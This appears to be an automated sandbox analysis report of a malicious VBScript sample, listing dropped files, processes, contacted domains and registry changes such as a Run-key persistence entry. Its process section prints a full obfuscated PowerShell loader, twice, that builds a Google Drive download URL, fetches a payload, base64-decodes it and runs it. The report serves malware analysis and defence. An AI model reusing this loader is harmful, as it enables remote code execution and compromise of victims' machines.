Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Umulighed.vbs
|
ASCII text, with very long lines (359), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kv1ep3h.uqt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxcys0t.gux.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dymm4kuh.4yf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjxdvaew.bfw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Klapjagters.Sep
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function
Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned,
$Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi
GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh.
Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0
Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto
AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu
';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso
DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1
CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0
JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken
'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe
envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu
Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke
');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB
JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld
');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj
KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur
';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen
HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC
cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn
HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit
eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane:
SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev
-Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe
PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando
Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh
zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru
H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid
ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd
Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots
(Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac(
Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns
r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb
DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS
Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB
seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp
rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt
.ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu
charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk
') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug
Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo
Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto
LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf
J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf
dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6
Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo
bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii
Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$
Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera
H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie
SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo
tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function
Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned,
$Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi
GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh.
Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0
Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto
AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu
';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso
DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1
CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0
JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken
'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe
envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu
Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke
');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB
JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld
');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj
KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur
';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen
HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC
cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn
HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit
eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane:
SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev
-Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe
PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando
Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh
zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru
H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid
ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd
Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots
(Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac(
Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns
r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb
DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS
Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB
seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp
rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt
.ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu
charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk
') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug
Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo
Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto
LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf
J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf
dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6
Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo
bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii
Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$
Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera
H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie
SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo
tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://r3.i.lencr.org/0R
|
unknown
|
||
|
http://mail.cash4cars.nz
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://r3.o.lencr.org0
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/i
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://aka.ms/pscore6lBtq
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.cash4cars.nz
|
114.142.162.17
|
|
|
|
drive.google.com
|
142.251.2.101
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
||
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
114.142.162.17
|
mail.cash4cars.nz
|
Australia
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
||
|
142.251.2.101
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
newfile
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
